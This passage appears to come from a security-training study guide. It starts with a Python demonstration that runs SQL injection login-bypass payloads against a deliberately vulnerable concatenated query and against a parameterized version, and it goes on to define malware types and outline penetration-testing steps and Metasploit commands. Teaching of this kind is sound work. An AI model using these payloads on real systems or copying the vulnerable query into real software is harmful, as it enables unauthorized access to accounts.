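As an added example (not code from the original report or from any real admin page), the script below runs the payloads from the list against a login query built by string concatenation and against the parameterized version of the same query, on an in-memory SQLite database with two constructed users. The table layout, user names and the clear-text password column are assumptions for the demonstration; a real application stores salted hashes.

```python
"""Login bypass with ' or 1=1-- against a string-built query, beside the
parameterized version that is immune to it.

Added example, not from the original report or any real site. Uses an
in-memory SQLite database with constructed users; passwords are stored in
clear text only to keep the demonstration short.
"""
import sqlite3


def make_db():
    """Constructed users table with one admin and one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "S3cr3t!", "admin"), ("bob", "hunter2", "user")])
    return conn


def render_query(username, password):
    """The statement a vulnerable admin page builds by string concatenation."""
    return ("SELECT username, role FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))


def login_vulnerable(conn, username, password):
    """Returns (username, role) if any row matches, else None. The input is part
    of the SQL text, so a quote in the password rewrites the WHERE clause."""
    return conn.execute(render_query(username, password)).fetchone()


def login_safe(conn, username, password):
    """Same check with placeholders: the driver sends the values separately, so
    ' or 1=1-- is compared as a literal password and never matches."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()


# Four payloads from the list above; the double-quoted one only works against an
# application that wraps its values in double quotes, which this one does not.
PAYLOADS = ["password' or 1=1--", "' or '1'='1", "' or 0=0 --", "\" or 0=0 --"]


def run_sample():
    """payload -> (vulnerable result, safe result), logging in as 'Admin'."""
    conn = make_db()
    return {p: (login_vulnerable(conn, "Admin", p), login_safe(conn, "Admin", p))
            for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_sample().items():
        print(f"{payload!r:22} vulnerable -> {vuln}  parameterized -> {safe}")
        print("   query:", render_query("Admin", payload))
```

Notice that the user name "Admin" does not even match the stored "admin": the OR clause makes the username check irrelevant, which is why the bypass returns the first row in the table, usually the administrator.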
Malware
Malware is a big catch-all term that covers all sorts of software with nasty intent. Not
buggy software, not programs you don't like, but software which is specifically
written with the intent to harm.
Virus:
A specific type of malware that spreads itself once it is initially run. It is
different from other types of malware because it can either be like a parasite that
attaches itself to good files on your machine, or it can be self-contained and search out
other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the
kind that move around on their own. In the malware sense, they are viruses that are
self-contained (they do not attach themselves like a parasite) and go around
searching out other machines to infect, typically through a network service and without
any action by the user.
Trojan:
Do you remember that story you had to read in high school about the big wooden
horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but it
turns out that it is neither fun nor important, and it is now doing nasty things to your
machine.
Penetration Testing
Introduction:
Penetration testing is divided into automated testing (vulnerability assessment using tools) and
manual testing (using Metasploit and similar frameworks).
1. If we want to do a pen test on any website, like www.anysite.com, we need its
DNS records from robtex.com, its whois records and other kinds of
information; this part is known as information gathering.
2. Next we use the BackTrack operating system (also known as the pen-testing OS
for security experts) and its toolkit for automated pen-testing with the help of free tools
like Nikto, Privoxy, Nessus, Samurai, etc.
3. Make a report of all the vulnerabilities found and cross-verify them.
4. Use commercial software like:
Core Impact, Canvas, QualysGuard, Xcobra, NTOSpider, KSES,
AppScan, WebInspect, Burp Suite, Acunetix WVS, etc.
5. Make a report of the new vulnerabilities.
6. Then we start manual pen-testing with the help of Metasploit and
reverse engineering tools.
7. Find vulnerabilities and take screenshots as proof of concept, then create a
custom report.
8. Forward the custom report to the company.
Metasploit
1. What is Metasploit?
The Metasploit Project is an open-source computer security project which
provides information about security vulnerabilities and aids in penetration
testing and IDS signature development. Its most well-known sub-project is the
Metasploit Framework, a tool for developing and executing exploit code
against a remote target machine. Other important sub-projects include the Opcode
Database, the shellcode archive and security research. Metasploit is one of the best
frameworks for local and remote exploitation and makes the work much easier.
Metasploit terms:
msfconsole:
msfconsole commands:
1. show: entering 'show' at the msfconsole prompt will display every
module within Metasploit. There are a number of 'show' commands
you can use, but the ones you will use most frequently are 'show
auxiliary', 'show exploits', 'show payloads' and 'show encoders'.
2. check: not many exploits support it, but there is also
a 'check' command that will check whether a target is vulnerable to a
particular exploit instead of actually exploiting it.
3. sessions -i: to interact with a given session, you just need to use the '-i'
switch followed by the ID number of the session.
Reason for choosing CEH
http://anti-virus-software-review.toptenreviews.com/